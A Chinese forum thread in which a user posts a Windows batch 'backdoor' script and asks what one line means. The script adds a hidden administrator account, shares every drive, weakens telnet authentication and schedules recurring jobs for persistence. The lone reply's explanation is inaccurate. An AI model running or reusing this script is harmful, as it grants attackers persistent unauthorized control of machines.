批处理写的“不死后门”求解释
批处理吧
全部回复
仅看楼主
level 1
iQefen 楼主
@echo off
@attrib +s + rxyt.bat
@net user xyt hacker/add
@net localgroupadministrators xyt /add
@net share c$=c:
@net share d$=d:
@net share e$=e:
@net share f$=f:
@tlntadmn config sec= -ntlm
@net stop schedule
@net start schedule
@echo at 11:00c:\WINNT\SYSTEM32\log.bat >c:\WINNT\SYSTEM32\xyt.bat
@echo at 23:00c:\WINNT\SYSTEM32\log.bat >>c:\WINNT\SYSTEM32\xyt.bat
@at 11:05c:\WINNT\SYSTEM32\xyt.bat
@at 23:05c:\WINNT\SYSTEM32\xyt.bat
@net stop telnet
@net start telnet
@exit
中间这句“@echo at 11:00c:\WINNT\SYSTEM32\log.bat >c:\WINNT\SYSTEM32\xyt.bat”什么意思 有什么作用吗
2014年12月13日 17点12分 1
level 7
把登录内容写入xyt
2014年12月13日 23点12分 2
有什么作用呢 这样做有什么好处呢
2014年12月14日 05点12分
1